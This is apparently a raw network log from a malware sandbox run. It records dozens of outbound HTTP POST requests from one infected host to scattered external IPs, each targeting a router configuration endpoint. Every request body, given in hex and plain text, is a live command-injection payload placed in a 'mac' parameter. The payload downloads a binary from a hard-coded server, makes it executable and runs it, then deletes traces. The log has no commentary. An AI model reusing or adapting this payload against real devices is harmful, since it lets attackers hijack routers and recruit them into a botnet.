                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2677192.168.2.2337094110.31.199.1158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475579023 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2678192.168.2.234414881.9.20.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475586891 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2679192.168.2.2357778204.155.86.548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475606918 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2680192.168.2.234390499.0.197.178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475620031 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2681192.168.2.2334416103.243.93.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475645065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2682192.168.2.233930267.128.39.528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475662947 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2683192.168.2.2342178204.230.16.438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475687027 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2684192.168.2.2349084183.164.125.1918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475707054 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2685192.168.2.235928866.234.52.808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475713968 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2686192.168.2.2356528181.16.93.358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475738049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2687192.168.2.2358036116.28.191.1668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475771904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2688192.168.2.2339350132.103.239.828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475778103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2689192.168.2.2357092178.114.163.1058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475830078 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2690192.168.2.2354692152.35.3.1888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475852966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2691192.168.2.23571661.56.68.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475856066 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2692192.168.2.2340446163.183.146.1998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475970984 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2693192.168.2.234344095.50.212.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476012945 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2694192.168.2.2347250168.87.47.1578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476031065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2695192.168.2.2350032174.159.244.1068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476058960 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2696192.168.2.235141093.29.22.2338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476080894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2697192.168.2.2352028201.50.65.2428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476083994 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2698192.168.2.2342916212.208.112.1328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476094961 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2699192.168.2.233949478.180.51.278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476119995 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
